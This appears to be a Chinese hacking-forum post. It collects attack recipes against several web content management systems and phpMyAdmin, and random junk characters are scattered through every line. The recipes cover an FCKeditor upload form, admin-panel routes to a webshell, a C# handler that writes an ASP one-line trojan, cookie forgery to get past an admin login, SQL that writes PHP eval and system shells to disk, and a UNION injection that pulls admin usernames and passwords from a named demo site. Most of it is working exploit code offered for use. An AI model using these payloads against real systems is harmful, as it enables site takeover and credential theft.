<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">9 k' b" O' r2 i1 B! y, s* _
Upload a new file:<br>
8 E3 D6 M' Y+ o9 H<input type="file" name="NewFile" size="50"><br>% f2 m" ^! r- D8 ?
<input id="btnUpload" type="submit" value="Upload">
) f! h0 Z/ o# T* @4 M) b1 S</form>4 f/ L3 R7 M4 x! R
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
, Q0 Q R3 P& p) z4 q) ~6 \+ j5 v/ ~- ^, x5 j; K
SDcms 后台拿webshell# }% {' s; |! T' `2 X
q) S8 c& K. `* e$ w: \第一种方法:9 {0 v) {% b) Y" T
进入后台-->系统管理-->系统设置-->系统设置->网站名称;4 N; I9 r0 ]- l3 i9 Q3 T
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
& l8 ]0 x) y+ u- j: n8 X* J( g3 @用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。( v6 ^$ D# V! q( ]8 ]
第二种方法:" W- W; I1 i' v, r# {& g
进入后台-->系统管理-->系统设置-->系统设置->上传设置;+ y+ A% f% P d! t; p. c
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
0 Q, J2 k D. V" \第三种方法:; t5 |2 {4 m+ [: i3 o: `9 c. @
进入后台-->界面管理-->模板文件管理-->创建文件
/ y3 ]: m. f# i+ Q/ X+ G: n# A3 {文件名写入getshell.ashx
( n( n9 e5 K2 v+ {内容写入下面内容:* H. d: D+ A4 G, M) E
/====================复制下面的=========================/8 q F1 u: v. s9 U6 |9 b: [" g
<%@ WebHandler Language="C#" Class="Handler" %>
3 S$ T. q+ {. F" J. Tusing System;
$ ?7 ]0 s7 f/ W, [- rusing System.Web;
( B3 g1 a) ~4 Tusing System.IO;! ~. a& W x N( B5 D* _9 E; y
public class Handler : IHttpHandler { v4 H% ^# p ^/ P6 S) E0 y2 s, m( O; a
public void ProcessRequest (HttpContext context) {
- X* J8 |; c6 g6 F1 _ dcontext.Response.ContentType = "text/plain";
! S3 C! s u8 r: X# I4 q. [StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));* \+ L) a/ B$ q* P" z
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
$ b6 F( j: \+ c" v! yfile1.Flush();7 S; o, j) w4 R+ C+ u& l) H
file1.Close();6 S+ l' m V& ~) B
}
- t( ~7 Z' C4 _5 O4 r( epublic bool IsReusable {% L- D5 X. p1 Q
get {, F/ W- H3 L1 D6 K* K* C
return false;
5 h5 w. b0 J) p# s, p! G; Z}6 x b& ^+ |9 c, F- T
}
) N9 U% w+ @5 N% v- E; R8 n- N}( b; d& U7 a3 F( M1 w
/=============================================/2 k! |8 |& t/ B. q+ s( Z7 |/ z) P- G
访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx
" Q g" Y) s, h* [6 J' E2 G: |" A会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接- L# A* [" [' @* w7 E% `
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; U" [7 C/ m7 v; J- e+ b6 E9 q+ T6 C. D" B1 d+ K* Y! g
ESCMS网站管理系统0day0 O- k, B+ I" G+ `9 o. k3 j2 N
# @" h/ i/ S% a0 {, D- d/ Q! }
后台登陆验证是通过admin/check.asp实现的9 f/ O$ t) C- R& j
: c# Y/ t$ ^. N" Q) r5 v首先我们打开http://target.com/admin/es_index.html1 z9 U! J S3 Y s `% s
然后在COOKIE结尾加上
! @0 c7 O7 s) g: L3 ^; ESCMS$_SP2=ES_admin=st0p;) p2 _8 \) ?( w C% P9 M H
修改,然后刷新3 \. H8 O- n$ Y P/ c$ k x5 {
进后台了嘎..: V: a7 ?# E; c2 x3 ?: q
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
Z3 W. r! D# t/ J, t; f5 X: ~1 C, t1 a5 k- G& v4 @0 K) n$ ^% I
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
% P4 `) ?8 z d嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp5 @6 O: }- A/ M* U
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败../ z2 r7 W; V! b& o/ j& V2 H
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了2 Q8 C# d7 R: \& B3 ?
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: @2 r2 j+ B: @+ m
# i4 z7 b# _9 ~4 U+ D宁志网站管理系统后台无验证漏洞及修复: v* h. ]; L+ r; q* M9 H7 f
* t; ?- R2 z% ^- ^3 p
网上搜了一下,好像没有发布.如有雷同纯粹巧合!* O$ j# C! J2 H1 Z1 d; R
官方网站:www.ningzhi.net+ A7 M" x* o& c% J0 t# Q
学校网站管理系统 V.2011版本
! M( O8 Y: b; ghttp://down.chinaz.com/soft/29943.htm & F) n0 q! y! ?3 Y
其它版本(如:政府版等),自行下载.8 c" a/ v `3 F% Q Q
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
; P% _: D# J( A3 e4 ?6 B" H" _login.asp代码如下:
6 I$ e6 y; g- w3 T" \<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> : {/ I8 S' U& |9 B1 n
manage.asp代码我就不帖出来了.反正也没验证.
, M/ @$ b1 E* t只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!+ P I: G) G# X9 b0 a1 ^; {4 _
漏洞利用:
9 o: K7 F" ]* P& q* T$ t直接访问http://www.0855.tv/admin/manage.asp
5 e$ C( |% A3 B! d7 U; u7 `2 d/ D数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
7 e2 k0 A0 V1 [+ [- V a$ Q1 `$ p----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
* n' I6 u: |7 f9 ?# l# [" K7 _; I- f* V: o. M# B0 v: K' H; b' t6 ]/ B6 U
phpmyadmin拿shell的四种方法总结及修复8 i3 |. E3 |3 @5 F
. t6 }: g$ R8 m, |4 Q o
方法一:: {$ ]5 A3 ^6 n& p' J) Z
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
4 E2 E4 A* i+ N& SINSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
: @% l4 G# x& V+ iSELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';! p% a* P& {6 S4 R" \# v
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php% E; J, }. ?6 k, p3 C$ v x! ^
一句话连接密码:7on
+ i- {( X% D" e, K方法二:
2 ?2 A" {8 J7 P2 U; J& k1 _ G0 w读取文件内容: select load_file('E:/xamp/www/s.php');
% i. r' y$ e* b% H% x; K写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
, G5 W( y9 p8 ?" L2 ~* Ncmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
$ W# {/ V" N6 G方法三:
, H' D% [2 `0 d; {3 @5 gJhackJ版本 PHPmyadmin拿shell/ x, @- v, j/ P5 o6 d5 y
Create TABLE study (cmd text NOT NULL);( R0 y) v3 L; ?/ z
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');7 E9 y. O" Y6 b) p- \, M
select cmd from study into outfile 'E:/wamp/www/7.php';
9 {, a6 {# K3 A$ DDrop TABLE IF EXISTS study;. l/ o+ v0 F; ?" o7 s" K+ C, b4 d/ e
<?php eval($_POST[cmd])?>
; z7 _! I2 y" t$ w7 U. aCREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。* F9 l* n/ w, M8 A5 i
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
( f8 A* e6 K6 V: a+ h FSELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1$ B8 p. R) L8 y; G- a) s7 Z2 d. V. R
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。6 b- [' b, z2 L; |
方法四:: H0 x. |9 R3 n# s! [6 e5 _
select load_file('E:/xamp/www/study.php');
3 R o. U" z& ]& `. Yselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
; t; [& x5 {. x4 l然后访问网站目录:http://www.2cto.com/study.php?cmd=dir& m2 U. c* y2 J& O2 g9 D7 {
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------+ ~. i8 r+ O* Y a1 r2 z/ I. r
$ h6 w5 p7 L$ T! P5 |NO.001中学网站管理系统 Build 110628 注入漏洞
6 ~- h1 z% ~7 l
2 M }) b Q9 j% e$ BNO.001中学网站管理系统功能模块:+ M) I- h/ o6 A: x3 i! F" D0 `* z
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等# J* z5 L6 U2 h0 W- a& L% D2 Z
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
- T* h0 _! X" F+ z, X3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
# Q7 n: _6 O; Q- M# z- P4.视频图片管理:一级分类,动态添加视频或者图片等信息0 f2 h) O; e9 e6 V- L3 h8 t' j0 v
5.留言管理:对留言,修改,删除、回复等管理0 y( c5 F5 R& W; p, U* \
6.校友频道:包括校友资料excel导出、管理等功能
/ P! b3 K) \! N; L6 S7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
2 B( j$ ]3 S9 v; Z. ^默认后台:admin/login.asp
3 [6 h/ ]8 n$ A7 o' I6 x& I" w官方演示:http://demo.001cms.net
- u" Q/ T' m& j4 k源码下载地址:http://down.chinaz.com/soft/30187.htm8 ^' @" u. Y" T' F: Z+ D
EXP:
( c9 Q, w- A0 n D/ Iunion select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
- W& E2 I) v' r! [) F+ s3 x5 E; [- F测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin9 i/ g5 K4 t% l' Z( a
getshell:后台有备份,你懂的
3 h8 \! C- m; V* x p- P另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
/ x" \- P5 v' ^4 ?4 l------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
匿名
发表于 2017-10-28 08:21:04
发表于 2012-9-13 16:58:38
收藏
支持
反对